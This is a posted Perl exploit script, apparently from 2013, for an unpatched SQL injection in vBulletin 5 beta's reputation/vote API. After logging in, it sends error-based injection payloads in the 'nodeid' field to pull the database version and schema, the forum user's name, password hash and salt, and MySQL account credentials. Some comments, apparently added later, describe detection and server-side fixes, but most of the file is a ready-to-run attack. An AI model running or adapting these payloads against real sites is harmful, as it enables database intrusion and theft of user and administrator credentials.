yacine_haxor & vBulletin 5.0.0 Beta
Jul 30th, 2014
  1.  
  2.  
  3. #!/usr/bin/perl
  4. ###################################################################################
  5. # Saturday, March 30, 2013
  6. #
  7. #
  8. #
  9. # _ _ .__ .__
  10. # __| || |_| | ____ ____ |__| ____ ____
  11. # \ __ / | _/ __ \ / ___\| |/ _ \ / \
  12. # | || || |_\ ___// /_/ > ( <_> ) | \
  13. # /_ ~~ _\____/\___ >___ /|__|\____/|___| /
  14. # |_||_| \/_____/ \/
  15. # http://www.zempirians.com
  16. #
  17. # 00100011 01101100 01100101 01100111 01101001 01101111 01101110
  18. #
  19. #
  20. #
  21. # [P]roof [o]f [C]oncept, SQL Injection
  22. # vBulletin™ is the world leader in forum and community publishing software.
  23. #
  24. #
  25. #
  26. ###################################################################################
  27. # # T E A M #
  28. # #######################
  29. #
  30. # UberLame .......> Provided all proper payloads
  31. # Stealth ........> Thanks ;)
  32. #
  33. ###################################################################################
  34. # SUMMARY #
  35. ################
  36. #
  37. # http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
  38. #
  39. # Database error in vBulletin 5.0.0 Beta 28:
  40. # MySQL Error : Duplicate entry '#5.1.67#1' for key 'group_key'
  41. # Error Number : 1062
  42. # Request Date : Saturday, March 30th 2013 @ 01:13:40 AM
  43. # Error Date : Saturday, March 30th 2013 @ 01:13:41 AM
  44. # Script : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
  45. #
  46. ################
  47. # VULNERABLE #
  48. ################
  49. #
  50. # vBulletin 5 beta [ALL] - http://vbulletin.com
  51. #
  52. ################
  53. # CONFIRMED #
  54. ################
  55. #
  56. # vBulletin 5 beta 17
  57. # vBulletin 5 beta 28
  58. #
  59. ################
  60. # CVE #
  61. ################
  62. #
  63. # There is no CVE reported.
  64. #
  65. ################
  66. # PATCH #
  67. ################
  68. #
  69. # There is no PATCH available.
  70. #
  71. ###################################################################################
  72. # # #
  73. # # H O W - T O #
  74. # # #
  75. # #######################
  76. #
  77. # Provide the Target: Server, Folder, User, Password, Number and the script will
  78. # login and deliver the payload...
  79. #
  80. # [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
  81. #
  82. ###################################################################################
  83. use LWP::UserAgent;
  84. use HTTP::Cookies;
  85. use HTTP::Request::Common;
  86. use MIME::Base64;
# Clear the terminal before the banner; the command is chosen by platform.
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
###############################################################################
#'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
#..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
#:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
#::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
#:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
#: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
# ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
#........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
###############################################################################
 
[?] Homepage: http://www.zempirians.com
[?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
[?] Effected: vBulletin 5 Beta XX SQLi 0day
[?] Irc Server: irc.zempirians.com +6697
 
";
# Exactly five positional arguments are required; anything else prints the
# usage line and exits.
if (@ARGV != 5) {
print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
print "\r\n";
exit;
}
# Positional arguments in the order the usage line gives them. These are
# package globals: the file never enables strict or warnings.
$host = $ARGV[0];
$path = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
# Base64 form of the forum base URL; it is sent as the 'url' field of the
# login form below.
$encpath = encode_base64('http://'.$host.$path);
  117.  
print "\n";
print "[+] Establishing connection and logging in\n";

# One user agent and one cookie jar are used for the whole session.
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;

# Ordinary form login against auth/login. For detection purposes this request
# is unremarkable on its own; the signal is the burst of POSTs to the
# reputation/vote API that follows it from the same session.
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
# NOTE(review): `User-Agent` is unquoted here, and `=>` auto-quotes only the
# identifier directly before it (`Agent`), so this pair may not set a
# User-Agent header at all and LWP's default would be sent instead — confirm
# before keying any detection on the Firefox string below.
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$browser->cookie_jar( $cookie_jar );
  135.  
print "[+] Send payload [ 1 of 4 ]\n";
# POST to the reputation/vote API. The 'nodeid' field carries the numeric
# node id followed by an injected SQL expression; the server's database error
# text then echoes the injected value back in the response body.
# Mitigation on the server side: validate 'nodeid' as an integer (or bind it
# as a query parameter) before it reaches the query, and never return raw
# MySQL error messages to the client. Detection: a non-numeric 'nodeid' on
# this endpoint, in particular one containing 'information_schema'.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataA = $response->content;
# Take the first '#...#'-delimited token from the response body; backslash-
# escaped characters are allowed inside the delimiters. The capture is the
# whole token including both '#'.
if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
$fixversion = $1;
# Strip the '#' delimiters, leaving the bare value.
$fixversion =~ s/\#//g;
# Fixed 23-byte window at offset 58 of the response body — presumably the
# product/version string of the error page; position-dependent, verify
# against the real response.
$fixvb = substr($dataA, 58, 23);
};

# Same request shape and same extraction, this time for the schema name.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataAB = $response->content;
if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbdb = $1;
$fixvbdb =~ s/\#//g;
};


# If either extraction above failed, these variables are undefined and print
# as empty strings (no warnings are enabled in this file).
print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
print "\n";
  165.  
print "[+] Send payload [ 2 of 4 ]\n";
# Same endpoint and request shape as the earlier stages; the injected
# expression is what changes. `my $response` is redeclared on every stage;
# without `use warnings` no "masks earlier declaration" warning is emitted.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataB = $response->content;
# First '#...#'-delimited token in the body, delimiters stripped. Unlike the
# other stages, the result line is printed only when the match succeeds.
if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
$fixuserhost = $1;
$fixuserhost =~ s/\#//g;
print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
};
print "\n";
  180.  
print "[+] Send payload [ 3 of 4 ]\n";

# Three requests against the same endpoint; the schema name recovered in an
# earlier stage ($fixvbdb) is interpolated into each injected expression. If
# that variable is empty, the table reference becomes '.user' and the
# requests fail. Detection: repeated POSTs to reputation/vote from one
# session whose 'nodeid' is non-numeric.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataC = $response->content;
# First '#...#'-delimited token in the body, delimiters stripped.
if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbuser = $1;
$fixvbuser =~ s/\#//g;
};


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataD = $response->content;
if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbpass = $1;
$fixvbpass =~ s/\#//g;
};


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataE = $response->content;
if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbsalt = $1;
$fixvbsalt =~ s/\#//g;
};


# Any value whose extraction failed prints as an empty string.
print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
print "\n";
  227.  
print "[+] Send payload [ 4 of 4 ]\n";

# Three more requests against the same endpoint, with the same '#...#'
# extraction as the earlier stages. Mitigation that stops every stage at
# once: integer-validate or parameter-bind 'nodeid' on the server, and run
# the application's database account with least privilege so it cannot read
# mysql.user.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataF = $response->content;
if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqluser = $1;
$fixsqluser =~ s/\#//g;
};

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataG = $response->content;
if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqlpass = $1;
$fixsqlpass =~ s/\#//g;
};

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataH = $response->content;
if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqlhost = $1;
$fixsqlhost =~ s/\#//g;
};


print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';

# Leftover debug output of the raw response body, kept disabled.
#print "\n\n[?] Error dump - payload 1\n\n";
#print $dataAB;

print "\n\n";

# Exits with status 1 unconditionally, so a shell caller cannot tell a
# successful run from a failed one by the exit code.
exit 1;